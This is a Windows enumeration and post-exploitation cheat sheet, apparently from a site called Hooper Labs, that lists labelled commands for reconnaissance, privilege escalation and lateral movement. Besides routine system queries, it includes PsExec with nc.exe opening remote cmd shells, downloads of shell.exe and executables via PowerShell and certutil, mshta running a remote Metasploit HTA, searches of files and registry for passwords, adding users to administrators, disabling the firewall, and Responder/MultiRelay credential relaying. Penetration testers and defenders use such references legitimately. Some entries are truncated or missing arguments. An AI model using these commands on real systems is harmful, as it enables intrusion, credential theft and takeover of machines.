Hooper Labs

Windows Enumeration



List System Info


List System Info (shortened)

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"



OS Version



Prints username

echo %username%

Display All User Info

whoami /all

Env Variables Beginning with "U"


Add User

net user <user> <password> /add

Add User to Group

net localgroup administrators /add <user>

Add User to Domain Group

net group "HR Admins" myUser /add /domain


Network Interfaces

ipconfig /all

Routing Table

route print

ARP Table

arp -A

All Open Connections

netstat -ano

All TCP Connections

netstat -ano -p TCP

Firewall State

netsh firewall show state firewall state

Firewall Config

netsh firewall show config firewall config

Firewall State

netsh advfirewall show currentprofile

Firewall Config

netsh advfirewall firewall show rule name=all

Turn off Firewall

netsh advfirewall set allprofiles state off

List Computers In Current Domain

net view

List Users

net users

List User Info

net user user1


net config

Processes, Services, Drivers

Scheduled Tasks

schtasks /query /fo LIST /v

Delete Scheduled Task


Create Scheduled Task

SCHTASKS /create /tn SERVERQR /sc DAILY /mo 365 /tr "cmd /c echo,Y|cacls C:\Windows\Fonts*.exe /G everyone:f"

Processes + Services

tasklist /SVC

Terminate Process

taskkill /PID pid

Kill Process forcefully by imagename

taskkill /F /IM wscript.exe

Running Services

net start

Query Service Config

sc qc [service_name]

Service Info

sc queryex state=

List Drivers


List Drivers

driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Get Loaded Driver Version Numbers

Get-WmiObject Win32PnPSignedDriver | Select-Object DeviceName,DriverVersion,Manufacturer | ?{$.DeviceName -like "XBox"}

Searching Files

PDF Search

dir /a /s /b c:\'.pdf'

Search for Patches

dir /a /b c:\windows\kb'

Search for Passwords

findstr /si password .txt .xml .xls .ini *.infrecursively from current directory

Search for filenames with password

dir /s pass == cred == vnc == .config

Search registry for password

reg query HKLM /f password /t REG_SZ /s | reg query HKCU /f password /t REG_SZ /s | reg query HKLM /v password /t REG_SZ /s

View Remote Files

dir \IP.ADD.RE.SS\C$

List Mounted Drives


Search for AlwaysInstallElevated

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

Search for AlwaysInstallElevated

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer


Enum Domain Info


Run As Different User

runas /u:Administrator cmd.exe

Copy output to Clipboard

| clip

Check File Permissions

cacls <Program File>

Check File Permissions


List Dirs and Owners

dir /q

Open Webpage


Installed Updates (Hotfixes)

wmic qfe get Caption,Description,HotFixID,InstalledOn

Kill Processes with Known ExecutablePath

wmic process where ExecutablePath='C:\Windows\Fonts\svhost.exe' delete


Download Page

powershell -command "& {&'wget' -OutFile shell.exe}"

Runas Equivalent

PsExec.exe /accepteula -u <user> -p <pass> nc.exe -nv 8888 -e cmd.exe

Get System Privileges

PsExec.exe /accepteula -i -d -s nc.exe -nv 8889 -e cmd.exe

Wget Equivalent

Invoke-WebRequest -uri <URL> -OutFile C:\Windows\TEMP\outfile.txt

System Internal Suite Notes

Accept EULA

accesschk.exe /accepteula

Find Files With Insecure Permissions

accesschk.exe -uws "Everyone" "C:\Program Files"

Check Auto Runs

Autorunsc.exe /accepteula

Check File Privs

C:\Users\Public\accesschk64.exe /accepteula *

Check Process Privs

accesschk.exe -vqp *

Find Permissions

accesschk.exe -uwdqs users c:\

Find Permissions

accesschk.exe -uwdqs "Authenticated Users" c:\

Find Permissions

accesschk.exe -uwqs users c:*.*

Find Permissions

accesschk.exe -uwqs "Authenticated Users" c:*.*

Find Permissions

cacls "c:\Program Files" /T | findstr Users

Stop network traffic to domain

echo my.crypto-pool.info >> %WINDIR%\system32\drivers\etc\hosts

Take Ownership of a File

takeown /F file.txt

MSHTA.exe Code Execution

Start metasploit server (exploit/windows/misc/hta_server). Then, run "mshta.exe //<ip-addr>/random.hta" on the host machine.

Temporary Folder (System)


Temporary Folder (User)



List Groups

wmic group list brief

List Hotfixes

wmic qfe list brief

Desktop Information

wmic desktop list brief

CD Information

wmic cdrom list brief

NIC Information

wmic nic list brief

List Installed Programs (lists only installed by Windows Installer)

wmic product get name,version,vendor

Control Output of wmic Command

wmic process get name,processid

Start a Program

wmic /node:localhost process call create 'C:\file.exe'

Close a Program

wmic process where processid="1000" call terminate

Close a Remote Program

wmic /node:localhost /user:rambo /password:FirstBl00dPart3 process where name="paint.exe" call terminate

Turn on RemoteDesktop

-wmic /node:"servername" /user:"user@domain" /password: "password" RDToggle where ServerName="server name" call SetAllowTSConnections 1

LogicalDisk Free Space

wmic /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv MORE /E +2 >> SRVSPACE.CSV

List all Shares

wmic logicaldisk get name,providername

List all Shares


Mount a CIFS Share


List Startup Processes

wmic startup get caption,command,user

Run wmic Remotely

wmic /node:remotehost /username:rambo /password:FirstBl00dPart3 service where name="LanManServer" get caption,name,status,started


Make HTTP Request (Download a file)

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Open remote Office document

"C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe" "ms-word:nft|u|https://url/doc.dotm"

List Shadow Copies

List all autorun programs in XML format

autorunsc.exe -x > autoruns.xml

List all non-microsoft autoruns in CSV format

autorunsc.exe -m -v

List audit policy

auditpol /get /category:*

Turn on an audit policy

auditpol /set /subcategory:"Logon" /success:enable

Domain Joined

Get Domain Users

net user /domain

Get Domain Groups

net group /domain

Get Current Domain

Search AD

$ldapsearch = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchstr); $objDomain = New-Object System.DirectoryServices.DirectoryEntry; $ldapsearch.SearchRoot = $objDomain; $ldapsearch.filter="samAccountType=805306368"; $ldapsearch.FindAll();

Find Logged On Users

Get-NetLoggedon -ComputerName foobar

Find Logged On Sessions

Get-NetSessions -ComputerName dc02


Invoke MultiRelay (relays if an incoming connection is recieved)

python MultiRelay.py -t -u ALL

Determine if target is vulnerable

python RunFinger.py -i

Start Responder

python Responder.py -I eth0